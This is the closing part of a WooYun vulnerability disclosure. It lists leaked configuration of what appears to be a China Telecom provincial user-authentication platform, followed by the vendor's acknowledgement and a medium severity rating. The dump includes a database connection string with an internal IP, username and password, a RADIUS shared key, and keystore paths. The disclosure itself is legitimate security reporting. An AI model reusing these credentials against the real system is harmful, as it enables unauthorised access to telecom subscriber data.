smscode_description|尊敬的@MOBILENUMBER手机用户,您的验证码已经生成成功,验证码为@AUTHCODE,您可以通过该验证码进行绑定异网手机|异网手机下发验证码内容|验证码信息描述|0004|null|null
srcTermID|10659229|短消息发送方号码|短信发送方号码|0005|null|2012-12-03 10:55:22
syncAllDataSwitch|off|全量对比开关|全量对比开关,默认off|0002|null|null
terminal_deviceNo|null|天翼客户端设备号|天翼客户端设备号|0006|null|null
uamSyncTableSwitch|off|UAM同步中间表开关|UAM同步中间表开关,默认off|0002|null|null
uam_control_user_name|uauth|全量/增量数据比对UAM控制表对应的用户名|全量/增量数据比对UAM控制表对应的用户名|0007|2013-07-30 11:07:26|null
uam_dstSysID|000|认证方式类型|dstSysID|0007|null|null
uam_pwEncryType|9|uam传输的密码加密类型|uam传输的密码加密类型,9为明文,1为3DES加密|0003|null|2012-05-18 10:21:27
uam_requestcer|//WEB-INF//classes//ua//uam.cer|uam.cer文件路径|requestcer|0001|null|null
uam_requestxsd|//WEB-INF//classes//uamRequest.xsd|uamRequest.xsd文件路径|requestxsd|0001|null|null
uam_root_11013|//WEB-INF//classes//11013//|udbkeystore文件路径|uam_root_11013|0001|null|null
uam_root_11013_pwd|//WEB-INF//classes//11013//pwd.properties|pwd.properties文件路径|uam_root_11013_pwd|0001|null|null
uam_srcSysID|999|省份标识编码|srcSysID|0007|null|null
uam_transactionID|999|业务平台编码|transactionID|0007|null|null
uam_udb_conn_url|jdbc:oracle:thin:@10.41.16.224:1521:MDSP+udbc03+udbc03|UAM数据库连接URL|UAM数据库连接配置格式:jdbc:oracle:thin:@IP:1521:MDSP+用户名+密码|0007|null|null
uam_udb_fetch_count|5000|从UAM数据库每次抽取数据数量|从UAM数据库每次抽取数据数量,默认5000|0007|null|null
udb.AAAIP|127.0.0.1|宽带验证接口调用AAA时IP|宽带验证接口调用AAA时IP|0006|null|null
udb.AAA_key|huawei|Radius_share_key AAA约定共享密钥|Radius_share_key AAA约定共享密钥|0007|null|null
udb.ContactPerson|null|集成商联系人|集成商联系人|0008|null|null
udb.ISAP_edition_switch|on|宽带密码是否明文|对于宽带认证, on 时,PAP的用户密码是明文,off 时,PAP密码是密文的|0002|null|null
udb.Integrator|null|集成商|集成商|0008|null|null
udb.PwdType|0|获取动态密码类型|获取动态密码类型:0表示随机密码,1表示通用密码,2业务密码,默认0|0003|null|null
udb.UAMDeviceNo|1800000000100501|省UAM设备号|省UAM设备号|0006|null|null
udb.abilityOfAuth|null|UDB设计并发认证处理能力|UDB设计并发认证处理能力,次/秒|0008|null|null
udb.accountLogin.switch|off|是否验证存在绑定关系|on需要验证绑定关系,off有绑定需要验证没有就不验证|0002|null|null
udb.address|null|机房信息|系统所在机房位置|0008|null|null
udb.areaCode|027|城市区号|城市区号|0007|null|null
udb.authCodeLiveTime|180|验证码的有效时间|在校验验证码时要判断有效时间(单位:秒),默认600秒|0006|null|2013-07-18 17:16:14
udb.authenticator|off|是否需要验证认证字开关|认证字开关 on验证认证字,off不验证认证字|0002|null|null
udb.call_nation_count|3|调用SOAPURL 的次数|调用webServices接口的次数|0007|null|null
udb.commit_number|5000|中间表每次同步数据数|配置每次数据库提交记录条数,默认5000条|0006|null|null
udb.contractNumber|null|买方合同号|买方合同号|0008|null|null
udb.deviceName|userDatabase|UDB平台名称|UDB平台全称|0008|null|null
udb.distance|3|配置的时间间隔单位天|配置的时间间隔单位小时|0007|null|null
udb.governor|null|电信主管人员|电信主管人员|0008|null|null
udb.internet.ip.port|localhost:8080|AS在公网映射的IP:端口|第三方邮件激活绑定关系时,是在公网操作,因此该IP为AS对外映射的IP与端口|0006|null|null
udb.invoke_nation_update|on|CRM是否调用全国CRM接口|CRM调用全国更新开关,on调用全国公共更新接口,off调用CRM接口|0002|null|2011-10-10 17:08:38
udb.iptvBinding.lPage|/udb/redirect/jsp/web/iptvBindingLPage.jsp|IPTV绑定大页面|IPTV绑定统一帐号大页面|0006|null|null
udb.iptvBinding.mPage|/udb/redirect/jsp/web/iptvBindingMPage.jsp|IPTV绑定中页面|IPTV绑定统一帐号中页面|0006|null|null
udb.iptvBinding.sPage|/udb/redirect/jsp/web/iptvBindingSPage.jsp|IPTV绑定小页面|IPTV绑定统一帐号小页面|0006|null|null
udb.iptvPage|/udb/redirect/jsp/web/IPTVPassportLogin.jsp|IPTV单点登录大页面|IPTV单点登录大页面|0006|null|null
udb.iptvmPage|/udb/redirect/jsp/web/IPTVloginMiddle.jsp|IPTV单点登录中页面|IPTV单点登录中页面|0006|null|null
udb.iptvsPage|/udb/redirect/jsp/web/IPTVsPassportLogin.jsp|IPTV单点登录小页面|IPTV单点登录小页面|0006|null|null
udb.maintainer|null|电信维护人员|电信维护人员|0008|null|null
udb.nationServerSwitch|on|全国开关|连接全国UDB开关,默认on|0002|null|null
udb.notifySsCancelSoapName|userIDNotifyCancel|udb.notifySsCancelSoapName|CRM通知业务系统注销接口名称|0006|null|null
udb.notifySsSwitch|on|udb.notifySsSwitch|CRM通知业务系统接口开关|0006|null|null
udb.portal_device_no|1800000000000101|自服务设备号|自服务设备号|0006|null|null
udb.provinceNo|18|省份|省份|0006|null|null
udb.serverPath|http://hb.passport.189.cn:8080|省UDB地址|省UDB地址|0006|null|2011-08-30 15:33:21
udb.ss_device_no|1800000000000001|省设备号|省设备号|0006|null|null
udb.ssoPage|/udb/redirect/jsp/web/sPassportLogin.jsp|单点登录小页面|单点登录小页面|0006|null|null
udb.thirdEmailBind.switch|off|通行证帐号绑定第三方邮箱开关|通行证帐号绑定第三方邮箱开关|0002|null|null
udb.ticketSwitch|off|是否保存Ticket开关|on保存到内存中,off保存到数据库|0002|null|null
udb.updatePwdSwitch|off|是否允许修改服务密码开关|udb在crm更新服务密码的开关 on:打开 off:关闭|0002|null|2013-12-27 09:25:27
udbKpiFileDirectory|/home/udbtonetm/udbftpforkpi|存放kpi文件的UDB ftp服务器的文件路径|存放kpi文件的UDB ftp服务器的文件路径|0007|null|2014-05-09 10:19:42
udbWebKpiFiletmpDirectory|/home/udbtonetm/udbftpforwebkpi|存放webkpi文件的UDB ftp服务器的文件路径|存放webkpi文件的UDB ftp服务器的文件路径|0007|null|2014-05-09 10:20:10
weekly.collection.trigger|1|按周统计的kpi数据的采集时间|范围:(1~7),如:配置成1 表示每周一采集按周统计的kpi数据|0007|null|null

修复方案:

安全是个整体。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-09 14:32

厂商回复:

作为安全事件进行确认,转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论